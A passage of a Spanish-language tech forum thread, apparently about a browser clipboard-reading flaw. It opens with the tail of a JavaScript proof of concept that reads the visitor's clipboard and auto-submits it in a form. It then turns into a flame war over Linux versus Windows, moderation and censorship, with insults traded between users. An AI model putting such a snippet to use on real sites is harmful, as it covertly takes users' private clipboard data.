//without this if statement check, it bombs out with an error
if(typeof clipboardData != "undefined") {
var content = clipboardData.getData("Text");
document.forms["clip"].elements["content"].value = content;
}
document.forms["clip"].submit();
</script>
</body>
</html>

mmmm pos no se

🗨️ 1
BocaDePez
BocaDePez

Pues yo no veo que sea tan grave, el único usuario para quien puede representar una amenaza es al mismo gilipollas que se traga el primer mail de pishing que le llega con faltas de ortografia, el que se ilusiona con un mensaje que dice "I love you" o instala el primer "supersalvapantallas megaguay" que le llega de un guiri que no conoce o de un amigo suyo que, mira por donde, le habla en inglés siendo de Almendralejo.

Muchas ganas de los fanaticos de linux para armar jaleo por cualquier chorrada es lo que veo.

BocaDePez
BocaDePez

Solo digo que leer una noticia y sus correspondientes comentarios tal y como lo esta dejando Akuma de "decorao" es imposible. Lo peor de todo es que los moderadores no se pronuncien al respecto que le vamos a hacer, asi va el pais xD.

Akuma

Bueno, en vista de lo podrido ke esta BandaAncha, voy a eskribir mi ULTIMO mensaje. No merece la pena seguir intentado hacer ver a la gente ke no todo lo bueno es libre y viceversa al igual ke no todo lo propietario es malo y viceversa. Kansado ya de tanta falacia, tanta hipokresia y tanta tonteria de los subnormales o tambien konocidos komo "gasolineros"(jmoraf, Krigan, overpeer, carlosues, Stendall, K-Beast, rwx, etc.) ke pululan por esta web, mejor voy a visitar otro sitio donde por decir ke Windows le funciona bien a uno o ke la mayoria de soft libre es peor ke su ononimo propietario no le baneen/censuren y le insulten kada dos por tres debido a ello.

No se ke pensareis los ke akabais de llegar y leais esto, kiza penseis ke esta pagina e s una pagina libre komo otras ke SI ke los son(cable-usuarios.org). Nada mas lejos de la realidad, esta gentuza promulga kon el soft libre y patatin, patatan, pero a la hora de la verdad ni sikiera respetan la libertad de expresion. Asi ke tenedlo en kuenta, BandaAncha es una pagina hecha por y para Linuxeros ke visto lo visto debio de llamarse BarraPunto2.

Por ultimo solo komentar ke si alguna vez os censuran un mensaje, ke sepais ke no solo los usuarios pueden puntuar y dar los puntos, los moderadores de la web pueden puntuar, dar puntos y eskribir mensajes, censurando los ke no les interesen(osea, los ke esten a favor de algo relacionado kon Windows o Microsoft) komo ha kedado demostrado en este hilo(verdad rwx?). Asi ke no os asusteis si algun dia os censuran un mensaje, podria ser un usuario, pero kasi seguro ke habra sido un moderador. De hecho, seguramente este sea un mensaje "molesto" para ellos por decir la verdad, asi ke estara censurado y tendreis ke ver los mensajes kon -1 para poder verlo. No tendran huevos a dejarlo tal y komo yo lo ponga, accesible para todo el mundo.

Hasta nunka.Akuma.

P.D.: Si algun dia veis una "noticia" extraña komo esta, o ke no funciona bien la pagina del Real Madrid, o ke rociito se ha suicidado, o kosas asi, no os extrañe. Para ellos eso es noticia.

🗨️ 7
BocaDePez
BocaDePez

Que casualidad que el promotor de TODO lo que dices eres tu mismo, pero en fin, BandaAncha gana con tu marcha. Hasta siempre y perdona si no lloro.

alejandrosantos

Por la parte que me toca y para tu sorpresa, no he sido yo quien te ha puntuado negativamente. No sé si fue un usuario o si lo hizo Josh pero te aseguro que no he tenido nada que ver. Además, creo que apenas has sido puntuado nunca salvo en esta ocasión que te has metido a flodear sin sentido.

Tus opiniones son respetadas si buscan respeto y no insultos. Los defensores de Windows, en algún post ciertamente gracioso, te han dicho que los haces quedar como idiotas por tu comportamiento.

A mi me da igual lo que defiendas, es más, me encanta la variedad porque así se construyen debates atractivos aunque tú, estás lejos de contruir nada por tu tono absolutamente sobrado y que provoca la susceptibilidad de todo el que te lee.

Dale un poco a la cabeza a ver si, cuando todos opinan algo, si es que será tu forma de expresarte el problema y no otra cosa.

🗨️ 1
BocaDePez
BocaDePez

Los defensores de Windows, en algún post ciertamente gracioso, te han dicho que los haces quedar como idiotas por tu comportamiento

Con todos mis respetos es normal que digan algo asi si su comportamiento es analogo al visto ultimamente.

K-Beast

Como va la votacion de las k's?

BocaDePez
BocaDePez

En el fondo es que no te das cuenta. ¿No ves que hasta en tu supuesta despedida metes cizaña?. Tu eres el poseedor de la verdad absoluta, el resto NUNCA tiene razon y no solo eso, sino que tu manera de dirigirte tan prepotente es lo que te delata constantemente, llegando a atacar directamente a la Web, moderadores y usuarios pq TODOS estamos equivocados menos tu. Tienes un problema tio y en la vida real esa actitud poca cosas beneficiosas va a darte. Ahora bien, si algun dia se te bajan los humos, dejas de creerte el ombligo del mundo y poseedor de la verdad absoluta te llevaras mejor con todos, en esta web, en otras y por supuesto en tu vida cotidiana.

Saludos.

Pridebowl

macho si pensabas que barrapunto era una pagina sobre las virtudes de windows es que eres cortico. es una pagina sobre software libre y la leen la gente que apoya esa iniciativa.

🗨️ 1
Dou1985

Creo que necesitas volver a leer el post de Akuma xD

Saludos!

BocaDePez
BocaDePez

bola de weyes